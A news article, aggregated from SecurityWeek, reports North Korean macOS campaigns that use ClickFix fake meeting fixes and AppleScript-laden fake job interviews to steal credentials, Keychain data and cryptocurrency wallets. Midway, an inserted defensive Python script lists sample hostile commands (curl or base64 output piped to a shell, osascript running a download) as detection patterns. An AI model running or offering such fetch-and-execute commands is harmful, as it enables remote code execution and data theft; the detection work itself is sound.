North Korean Hackers Use AppleScript, ClickFix in Fresh macOS Attacks
The campaigns focus on financial organizations, including cryptocurrency, venture capital, and blockchain entities.

Aggregated from SecurityWeek
North Korean hackers have been using various social engineering and evasion techniques in recently observed attacks targeting macOS users within financial organizations.
A campaign uncovered by Any.Run has relied on the infamous ClickFix technique to trick macOS users into installing information-stealing malware.
The hackers have been mounting the attacks over Telegram, targeting business leaders, often using the compromised accounts of people known to the victim, with fake meeting invitations.
The victims have been directed to websites mimicking Zoom, Microsoft Teams, or Google Meet, and prompted to “fix” a fake connection issue by copying and executing a command in the Terminal.
This has resulted in the execution of Go-based Mach-O binaries, part of a malware kit dubbed Mach-O Man and designed to collect credentials, system secrets such as Keychain entries, and browser sessions. The data has been exfiltrated over Telegram.
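A defender's check for the ClickFix pattern described above (a pasted Terminal command that fetches and executes code, or decodes and executes a blob) and for shell commands launched through AppleScript, as an added example that is not part of the original article. The sample history lines are constructed and the hostnames are placeholders; on a real host the same rules can be run over `~/.zsh_history` or `~/.bash_history`.

```python
import re

# Constructed sample shell history lines (placeholders, not indicators from
# the article). Lines 1, 2 and 5 mimic a pasted ClickFix "fix" command.
SAMPLE_HISTORY = [
    "curl -fsSL https://example.invalid/fix.sh | bash",
    "echo Y3VybCAtcyBodHRwOi8vZXhhbXBsZS5pbnZhbGlkIHwgc2g= | base64 -d | sh",
    "git status",
    "brew install jq",
    "osascript -e 'do shell script \"curl https://example.invalid/p | sh\"'",
]

# Heuristics, checked in order: AppleScript running a shell command inline,
# a download utility piped into a shell interpreter, and base64-decoded text
# piped into a shell interpreter (macOS base64 uses -D, GNU uses -d).
PATTERNS = {
    "osascript-shell": re.compile(r"\bosascript\b.*do shell script"),
    "download-pipe-shell": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b"),
    "base64-pipe-shell": re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(ba|z)?sh\b"),
}


def flag_clickfix_lines(lines):
    """Return (line_number, rule, text) for each history line matching a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        for rule, rx in PATTERNS.items():
            if rx.search(line):
                hits.append((n, rule, line))
                break  # one finding per line is enough for triage
    return hits


def load_history(path):
    """Read a shell history file, stripping zsh's ': <ts>:<dur>;' prefixes."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return [re.sub(r"^:\s*\d+:\d+;", "", l.rstrip("\n")) for l in fh]


if __name__ == "__main__":
    for n, rule, text in flag_clickfix_lines(SAMPLE_HISTORY):
        print(f"line {n}: {rule}: {text}")
```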
Another campaign, attributed by Microsoft to Sapphire Sleet, a state-sponsored group active since at least 2020, has relied on AppleScript for code execution and detection evasion, but has been leading to the same outcome: sensitive data exfiltration.
The hackers have been using fake recruiter profiles on online platforms to engage in conversations with the victims and to invite them to technical interviews.
During the fake interviews, the victims have been asked to install malware masquerading as a video conferencing tool or a software development kit (SDK) update.
The campaign does not involve ClickFix, which relies on the victims’ willingness to copy the commands leading to malware infection. Instead, the downloaded file, a compiled AppleScript, would automatically open in macOS Script Editor to execute embedded arbitrary shell commands.
As part of the complex infection chain, multiple AppleScript payloads would be executed, ultimately leading to the deployment of several backdoors. The attack also focuses on achieving persistence and on privilege escalation.
The deployed payloads were designed to perform system reconnaissance, enumerate installed applications, and harvest Telegram data, browser profiles and the associated databases, Keychain databases, cryptocurrency wallets, SSH keys, shell history, the Apple Notes database, and system logs.